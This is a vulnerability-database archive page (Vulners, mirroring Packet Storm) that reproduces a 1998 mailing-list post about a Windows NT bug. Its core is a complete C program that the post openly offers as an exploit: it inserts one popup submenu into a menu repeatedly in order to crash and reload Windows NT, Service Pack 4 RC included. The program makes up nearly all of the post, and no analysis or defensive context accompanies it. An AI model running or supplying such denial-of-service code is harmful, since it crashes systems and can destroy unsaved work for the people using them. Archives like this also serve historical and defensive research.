Lucene search
K

ntsp4.bsod.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

This program reloads NT, tested with Service Pack 4 release candidate. Enjoy the exploit!

Code
`Date: Wed, 21 Oct 1998 09:08:40 +0300  
From: fill <[email protected]>  
To: [email protected]  
Subject: New NT Bug  
  
Hi!  
This small program reloads NT (but not win95).  
Tested with SP4 RC also.  
Enjoy!  
  
  
#include <windows.h>  
  
int WINAPI WinMain(HINSTANCE hinstExe,  
HINSTANCE hinstPrev, LPSTR lpszCmdLine,  
int nCmdShow)  
{  
HMENU hMenu = CreatePopupMenu();  
HMENU hMenu1 = CreatePopupMenu();  
AppendMenu(hMenu1,MF_STRING, 1, "1");  
AppendMenu(hMenu1,MF_STRING, 2, "2");  
AppendMenu(hMenu1,MF_STRING, 3, "3");  
InsertMenu(hMenu,1,MF_POPUP|MF_STRING,(UINT)hMenu1,"1");  
InsertMenu(hMenu,2,MF_POPUP|MF_STRING,(UINT)hMenu1,"2");  
InsertMenu(hMenu,3,MF_POPUP|MF_STRING,(UINT)hMenu1,"3");  
InsertMenu(hMenu,4,MF_POPUP|MF_STRING,(UINT)hMenu1,"4");  
InsertMenu(hMenu,5,MF_POPUP|MF_STRING,(UINT)hMenu1,"5");  
InsertMenu(hMenu,6,MF_POPUP|MF_STRING,(UINT)hMenu1,"6");  
return 0;  
}  
  
  
  
  
-------------------------------------------------------------------------=  
-------  
  
Ilya Filatov  
CherCom Co.,  
The system engineer  
  
-------------------------------------------------------------------------=  
-------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
19